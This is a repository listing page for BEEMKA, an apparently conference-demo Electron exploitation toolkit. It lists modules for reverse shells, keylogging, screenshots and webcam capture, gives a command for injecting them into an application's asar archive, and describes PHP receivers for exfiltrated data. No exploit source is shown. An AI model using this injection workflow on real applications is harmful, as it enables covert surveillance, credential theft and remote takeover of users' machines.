• Stars
    star
    201
  • Rank 194,491 (Top 4 %)
  • Language
    Python
  • License
    MIT License
  • Created almost 6 years ago
  • Updated about 5 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Basic Electron Exploitation

BEEMKA

Electron Exploitation Toolkit

BSidesLV Slack Cookie Egress Demo

Slack Cookie Egress

BSidesLV VSCode Source Code Egress Demo

VSCode Source Code Egress

Demo Videos (YouTube)

Bitwarden Password Egress

Bitwarden Password Egress

Skype Reverse Shell (Linux)

Skype Reverse Shell

Slack Desktop Screenshots

Slack Desktop Screenshots

VS Code WebCamera

Slack Desktop Screenshots

Requirements

  • Python 3.5+
  • jsmin

Installation

pip3 install -r requirements.txt

Modules

python3 beemka.py --list

Available modules

[ rshell_cmd ]          Windows Reverse Shell
[ rshell_linux ]        Linux Reverse Shell
[ screenshot ]          Screenshot Module
[ rshell_powershell ]   PowerShell Reverse Shell
[ keylogger ]           Keylogger Module
[ webcamera ]           WebCamera Module

Features:

usage: Beemka Electron Exploitation [-h] [-v] [-l] [-i] [-f ASAR_FILE]
                                    [-p ASAR_WORKING_PATH] [-o OUTPUT_FILE]
                                    [-m MODULE] [-u] [-z]

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -l, --list-modules    List all available modules.
  -i, --inject          Inject code into Electron.
  -f ASAR_FILE, --asar ASAR_FILE
                        Path to electron.asar file.
  -p ASAR_WORKING_PATH, --asar-working-path ASAR_WORKING_PATH
                        Temporary working path to use for extracting asar
                        archives.
  -o OUTPUT_FILE, --output OUTPUT_FILE
                        Path to the file that will be generated.
  -m MODULE, --module MODULE
                        Module to inject. Use --list-modules to list available
                        modules.
  -u, --unpack          Unpack asar file.
  -z, --pack            Pack asar file.

Injecting a module into an application:

python3 beemka.py --inject --module keylogger --asar "PATH_TO_ELECTRON.ASAR" --output "SAVE_AS_ASAR"

Exfiltration helpers

Under the ./server directory there are the following files:

text.php

This file can be used to receive data sent by the keylogger module.

Before using it, make sure you update the "$storage" parameter at the beginning of the file.

image.php

This file can be used to receive data sent by the webcamera and screenshot modules.

Before using it, make sure you update the "$storage" parameter at the beginning of the file.

Credits

Leonardo Vieira for his asar.py class

More Repositories

1

CAPE

Malware Configuration And Payload Extraction
Python
747
star
2

crackerjack

CrackerJack / Hashcat Web Interface / Context Information Security
Python
357
star
3

SnitchDNS

Database Driven DNS Server with a Web UI
Python
236
star
4

RDP-Replay

Replay RDP traffic from PCAP
C
183
star
5

canape

CANAPE Network Testing Tool
Python
183
star
6

django-admin-view-permission

Reusable application which provides a view permission for the existing models.
Python
151
star
7

DLLHSC

DLLHSC - DLL Hijack SCanner a tool to assist with the discovery of suitable candidates for DLL Hijacking
C++
138
star
8

DynamicLabs

Dynamic Labs is an open source tool aimed at red teamers and pentesters for the quick deployment of flexible, transient and cloud-hosted lab environments.
HCL
60
star
9

django-admin-multiple-choice-list-filter

Python
59
star
10

DynamicWrapperEx

x64 Registration-Free In-Process COM Automation Server.
C++
46
star
11

Furby

Python tools for handing Furby Connect DLC files
Python
43
star
12

capemon

CAPE monitor DLLs
C
38
star
13

cbrcli

Command line interface to Carbon Black Response
Python
38
star
14

cvsslib

A library implementing CVSS v2 and v3 scores
Python
31
star
15

pac-leak-demo

PAC HTTPS leak demo from DEF CON 24 'Toxic Proxies' talk
JavaScript
29
star
16

yate-bts

Yate BTS
C
20
star
17

VulnerableXsltConsoleApplication

Vulnerable XSLT Console Application
10
star
18

OpenBanking-BurpExtension

Java
7
star
19

stun-remote-control

Control Motorola/Binatone IP cameras behind NAT
Python
5
star
20

django-inline-admin-extensions

Add pagination to Django inline admin
Python
4
star
21

OpenBanking-MessageSigning

Java
3
star
22

RFTap

Modified RFTap dissector for Wireshark
C
3
star
23

OpenBanking-AuthorisationRedirect

Java
2
star
24

mid-level-interview

Python
1
star
25

blog

Archived posts from www.contextis.com
HTML
1
star
26

webdev-demo

An example of a typical web dev environment built with Docker, Django, Nginx, Redis, and more.
Python
1
star